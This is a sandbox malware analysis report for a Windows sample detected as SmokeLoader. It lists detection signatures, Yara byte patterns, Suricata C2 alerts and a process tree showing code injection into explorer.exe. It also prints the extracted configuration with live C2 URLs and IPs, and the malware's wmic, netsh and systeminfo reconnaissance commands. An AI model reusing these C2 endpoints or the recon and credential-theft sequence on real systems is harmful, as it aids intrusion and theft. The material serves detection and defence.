Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KTh1gQlT9a.exe

Overview

General Information

Sample name:KTh1gQlT9a.exe
renamed because original name is a hash value
Original sample name:6d9b8ff6442e3c42a7ad0e1238960057.exe
Analysis ID:1518333
MD5:6d9b8ff6442e3c42a7ad0e1238960057
SHA1:fab711b446c2cc55f97c7a5afaa9f9833e01a0ea
SHA256:a641af0462259586cf10b8867653e163f73b6066106455605643b08ab829ac77
Tags:exeLummaStealeruser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Found evasive API chain (may stop execution after checking mutex)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the windows firewall
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • KTh1gQlT9a.exe (PID: 6160 cmdline: "C:\Users\user\Desktop\KTh1gQlT9a.exe" MD5: 6D9B8FF6442E3C42A7AD0E1238960057)
    • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • E647.exe (PID: 4408 cmdline: C:\Users\user\AppData\Local\Temp\E647.exe MD5: 1A29ED2D1AE240EC1D6F50DCC960BAA3)
      • B575.exe (PID: 6160 cmdline: C:\Users\user\AppData\Local\Temp\B575.exe MD5: 12AD2C78F5EB326820444DCFE9DFA683)
      • explorer.exe (PID: 1684 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 6760 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 1532 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 6432 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
      • explorer.exe (PID: 3304 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: DD6597597673F72E10C9DE7901FBA0A8)
      • explorer.exe (PID: 5008 cmdline: C:\Windows\explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • cmd.exe (PID: 6476 cmdline: cmd MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WMIC.exe (PID: 4580 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5020 cmdline: wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 356 cmdline: wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5176 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 764 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 2656 cmdline: wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5996 cmdline: wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 6196 cmdline: wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 2800 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 1100 cmdline: wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5840 cmdline: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5500 cmdline: wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5428 cmdline: wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WMIC.exe (PID: 5988 cmdline: wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • ipconfig.exe (PID: 2316 cmdline: ipconfig /displaydns MD5: 62F170FB07FDBB79CEB7147101406EB8)
      • ROUTE.EXE (PID: 5512 cmdline: route print MD5: 3C97E63423E527BA8381E81CBA00B8CD)
      • netsh.exe (PID: 7016 cmdline: netsh firewall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • systeminfo.exe (PID: 2780 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • tasklist.exe (PID: 7064 cmdline: tasklist /v /fo csv MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
  • esjbbri (PID: 3176 cmdline: C:\Users\user\AppData\Roaming\esjbbri MD5: 6D9B8FF6442E3C42A7AD0E1238960057)
  • uejbbri (PID: 3724 cmdline: C:\Users\user\AppData\Roaming\uejbbri MD5: 1A29ED2D1AE240EC1D6F50DCC960BAA3)
  • msiexec.exe (PID: 2604 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Malware Configuration

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x12208:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.2900663679.00000000025ED000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x12300:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000004.00000002.2365295307.0000000002631000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000000.00000002.2141528306.00000000040E1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      Click to see the 25 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.E647.exe.24e0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        6.2.E647.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          7.3.uejbbri.24b0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            6.3.E647.exe.2610000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              7.2.uejbbri.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 1 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Execution of Suspicious File Type Extension
                Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\esjbbri, CommandLine: C:\Users\user\AppData\Roaming\esjbbri, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\esjbbri, NewProcessName: C:\Users\user\AppData\Roaming\esjbbri, OriginalFileName: C:\Users\user\AppData\Roaming\esjbbri, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Users\user\AppData\Roaming\esjbbri, ProcessId: 3176, ProcessName: esjbbri
                Sigma detected: Local Accounts Discovery
                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , CommandLine|base64offset|contains: h, Image: C:\Windows\System32\wbem\WMIC.exe, NewProcessName: C:\Windows\System32\wbem\WMIC.exe, OriginalFileName: C:\Windows\System32\wbem\WMIC.exe, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6476, ParentProcessName: cmd.exe, ProcessCommandLine: wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv , ProcessId: 5840, ProcessName: WMIC.exe
                Sigma detected: Suspicious Network Command
                Source: Process startedAuthor: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io': Data: Command: route print, CommandLine: route print, CommandLine|base64offset|contains: , Image: C:\Windows\System32\ROUTE.EXE, NewProcessName: C:\Windows\System32\ROUTE.EXE, OriginalFileName: C:\Windows\System32\ROUTE.EXE, ParentCommandLine: cmd, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6476, ParentProcessName: cmd.exe, ProcessCommandLine: route print, ProcessId: 5512, ProcessName: ROUTE.EXE

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T16:01:30.964560+020020391031A Network Trojan was detected192.168.2.549711116.58.10.6080TCP
                2024-09-25T16:01:32.199413+020020391031A Network Trojan was detected192.168.2.549712116.58.10.6080TCP
                2024-09-25T16:01:33.468152+020020391031A Network Trojan was detected192.168.2.549713116.58.10.6080TCP
                2024-09-25T16:01:34.746162+020020391031A Network Trojan was detected192.168.2.549714116.58.10.6080TCP
                2024-09-25T16:01:36.015287+020020391031A Network Trojan was detected192.168.2.549715116.58.10.6080TCP
                2024-09-25T16:01:37.606649+020020391031A Network Trojan was detected192.168.2.549716116.58.10.6080TCP
                2024-09-25T16:01:39.026227+020020391031A Network Trojan was detected192.168.2.549717116.58.10.6080TCP
                2024-09-25T16:01:40.325430+020020391031A Network Trojan was detected192.168.2.549718116.58.10.6080TCP
                2024-09-25T16:01:41.599554+020020391031A Network Trojan was detected192.168.2.549719116.58.10.6080TCP
                2024-09-25T16:01:42.875381+020020391031A Network Trojan was detected192.168.2.549720116.58.10.6080TCP
                2024-09-25T16:01:44.128986+020020391031A Network Trojan was detected192.168.2.549721116.58.10.6080TCP
                2024-09-25T16:01:45.386549+020020391031A Network Trojan was detected192.168.2.549722116.58.10.6080TCP
                2024-09-25T16:01:46.759129+020020391031A Network Trojan was detected192.168.2.549723116.58.10.6080TCP
                2024-09-25T16:01:48.049798+020020391031A Network Trojan was detected192.168.2.549724116.58.10.6080TCP
                2024-09-25T16:01:49.324358+020020391031A Network Trojan was detected192.168.2.549725116.58.10.6080TCP
                2024-09-25T16:01:50.596094+020020391031A Network Trojan was detected192.168.2.549726116.58.10.6080TCP
                2024-09-25T16:01:51.861069+020020391031A Network Trojan was detected192.168.2.549727116.58.10.6080TCP
                2024-09-25T16:01:53.130512+020020391031A Network Trojan was detected192.168.2.549728116.58.10.6080TCP
                2024-09-25T16:01:54.403705+020020391031A Network Trojan was detected192.168.2.549729116.58.10.6080TCP
                2024-09-25T16:01:55.668995+020020391031A Network Trojan was detected192.168.2.549730116.58.10.6080TCP
                2024-09-25T16:01:58.462541+020020391031A Network Trojan was detected192.168.2.549732116.58.10.6080TCP
                2024-09-25T16:01:59.729148+020020391031A Network Trojan was detected192.168.2.549733116.58.10.6080TCP
                2024-09-25T16:02:01.002562+020020391031A Network Trojan was detected192.168.2.549735116.58.10.6080TCP
                2024-09-25T16:02:02.511353+020020391031A Network Trojan was detected192.168.2.549736116.58.10.6080TCP
                2024-09-25T16:02:04.095673+020020391031A Network Trojan was detected192.168.2.549737116.58.10.6080TCP
                2024-09-25T16:02:06.505504+020020391031A Network Trojan was detected192.168.2.549738116.58.10.6080TCP
                2024-09-25T16:02:07.770118+020020391031A Network Trojan was detected192.168.2.549739116.58.10.6080TCP
                2024-09-25T16:02:09.265193+020020391031A Network Trojan was detected192.168.2.549740116.58.10.6080TCP
                2024-09-25T16:02:20.156005+020020391031A Network Trojan was detected192.168.2.54974123.145.40.162443TCP
                2024-09-25T16:02:21.806634+020020391031A Network Trojan was detected192.168.2.54974223.145.40.162443TCP
                2024-09-25T16:02:22.789674+020020391031A Network Trojan was detected192.168.2.54974323.145.40.162443TCP
                2024-09-25T16:02:23.667347+020020391031A Network Trojan was detected192.168.2.54974423.145.40.162443TCP
                2024-09-25T16:02:24.558695+020020391031A Network Trojan was detected192.168.2.54974523.145.40.162443TCP
                2024-09-25T16:02:25.615628+020020391031A Network Trojan was detected192.168.2.54974623.145.40.162443TCP
                2024-09-25T16:02:26.570388+020020391031A Network Trojan was detected192.168.2.54974723.145.40.162443TCP
                2024-09-25T16:02:27.541564+020020391031A Network Trojan was detected192.168.2.54974823.145.40.162443TCP
                2024-09-25T16:02:28.599198+020020391031A Network Trojan was detected192.168.2.54974923.145.40.162443TCP
                2024-09-25T16:02:29.775443+020020391031A Network Trojan was detected192.168.2.54975023.145.40.162443TCP
                2024-09-25T16:02:36.401964+020020391031A Network Trojan was detected192.168.2.54975123.145.40.162443TCP
                2024-09-25T16:03:21.252704+020020391031A Network Trojan was detected192.168.2.549752116.58.10.6080TCP
                2024-09-25T16:03:31.755722+020020391031A Network Trojan was detected192.168.2.549753116.58.10.6080TCP
                2024-09-25T16:03:45.252831+020020391031A Network Trojan was detected192.168.2.549754116.58.10.6080TCP
                2024-09-25T16:03:53.184311+020020391031A Network Trojan was detected192.168.2.54975523.145.40.162443TCP
                2024-09-25T16:04:04.585527+020020391031A Network Trojan was detected192.168.2.549756190.98.23.15780TCP
                2024-09-25T16:04:13.856339+020020391031A Network Trojan was detected192.168.2.54975723.145.40.162443TCP
                2024-09-25T16:04:26.957735+020020391031A Network Trojan was detected192.168.2.549758190.98.23.15780TCP
                2024-09-25T16:04:36.813735+020020391031A Network Trojan was detected192.168.2.54975923.145.40.162443TCP
                2024-09-25T16:04:50.039241+020020391031A Network Trojan was detected192.168.2.549760190.98.23.15780TCP
                2024-09-25T16:04:59.137001+020020391031A Network Trojan was detected192.168.2.54976123.145.40.162443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T16:02:20.563474+020028098821Malware Command and Control Activity Detected192.168.2.54974123.145.40.162443TCP
                2024-09-25T16:02:22.175887+020028098821Malware Command and Control Activity Detected192.168.2.54974223.145.40.162443TCP
                2024-09-25T16:02:23.074361+020028098821Malware Command and Control Activity Detected192.168.2.54974323.145.40.162443TCP
                2024-09-25T16:02:23.949540+020028098821Malware Command and Control Activity Detected192.168.2.54974423.145.40.162443TCP
                2024-09-25T16:02:24.991989+020028098821Malware Command and Control Activity Detected192.168.2.54974523.145.40.162443TCP
                2024-09-25T16:02:25.892849+020028098821Malware Command and Control Activity Detected192.168.2.54974623.145.40.162443TCP
                2024-09-25T16:02:26.856911+020028098821Malware Command and Control Activity Detected192.168.2.54974723.145.40.162443TCP
                2024-09-25T16:02:27.820364+020028098821Malware Command and Control Activity Detected192.168.2.54974823.145.40.162443TCP
                2024-09-25T16:02:28.922723+020028098821Malware Command and Control Activity Detected192.168.2.54974923.145.40.162443TCP
                2024-09-25T16:02:30.052893+020028098821Malware Command and Control Activity Detected192.168.2.54975023.145.40.162443TCP
                2024-09-25T16:02:36.940781+020028098821Malware Command and Control Activity Detected192.168.2.54975123.145.40.162443TCP
                2024-09-25T16:03:53.528263+020028098821Malware Command and Control Activity Detected192.168.2.54975523.145.40.162443TCP
                2024-09-25T16:04:14.335519+020028098821Malware Command and Control Activity Detected192.168.2.54975723.145.40.162443TCP
                2024-09-25T16:04:37.139984+020028098821Malware Command and Control Activity Detected192.168.2.54975923.145.40.162443TCP
                2024-09-25T16:04:59.516202+020028098821Malware Command and Control Activity Detected192.168.2.54976123.145.40.162443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T16:02:20.659998+020028298482Potentially Bad Traffic23.145.40.162443192.168.2.549741TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: KTh1gQlT9a.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://nwgrus.ru/tmp/index.phpAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Roaming\esjbbriAvira: detection malicious, Label: HEUR/AGEN.1310247
                Source: C:\Users\user\AppData\Roaming\uejbbriAvira: detection malicious, Label: HEUR/AGEN.1310247
                Source: C:\Users\user\AppData\Local\Temp\E647.exeAvira: detection malicious, Label: HEUR/AGEN.1310247
                Found malware configuration
                Source: 00000000.00000002.2138710138.0000000002610000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
                Multi AV Scanner detection for dropped file
                Source: C:\Users\user\AppData\Roaming\esjbbriReversingLabs: Detection: 34%
                Multi AV Scanner detection for submitted file
                Source: KTh1gQlT9a.exeReversingLabs: Detection: 34%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Roaming\esjbbriJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\uejbbriJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\B575.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\E647.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: KTh1gQlT9a.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB8736F0 CryptExportKey,CryptExportKey,8_2_00007FF7CB8736F0
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB873220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,8_2_00007FF7CB873220
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03273098 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,CryptUnprotectData,DeleteFileW,9_2_03273098
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03273717 GetTempPathW,GetTempFileNameW,DeleteFileW,CopyFileW,RtlCompareMemory,RtlZeroMemory,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,CryptUnprotectData,lstrlen,lstrlen,wsprintfA,lstrlen,lstrcat,lstrlen,DeleteFileW,9_2_03273717
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03273E04 RtlCompareMemory,CryptUnprotectData,9_2_03273E04
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_0327123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,9_2_0327123B
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03271198 CryptBinaryToStringA,CryptBinaryToStringA,9_2_03271198
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_032711E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,9_2_032711E1
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03271FCE CryptUnprotectData,RtlMoveMemory,9_2_03271FCE
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0322263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,12_2_0322263E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_03222404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,12_2_03222404
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 12_2_0322245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,12_2_0322245E
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_03092799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,16_2_03092799
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_030925A4 CryptBinaryToStringA,CryptBinaryToStringA,16_2_030925A4
                Source: KTh1gQlT9a.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\KTh1gQlT9a.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.5:49731 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49742 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49744 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49745 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49746 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49747 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49748 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49749 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49750 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49751 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49755 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49757 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49759 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.5:49761 version: TLS 1.2
                Source: C:\Users\user\AppData\Local\Temp\B575.exeCode function: 8_2_00007FF7CB87FB34 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,8_2_00007FF7CB87FB34
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03272B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,9_2_03272B15
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03273ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,9_2_03273ED9
                Source: C:\Windows\SysWOW64\explorer.exeCode function: 9_2_03271D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,9_2_03271D4A
                Source: C:\Windows\explorer.exeCode function: 11_2_001D30A8 FindFirstFileW,FindNextFileW,FindClose,11_2_001D30A8
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
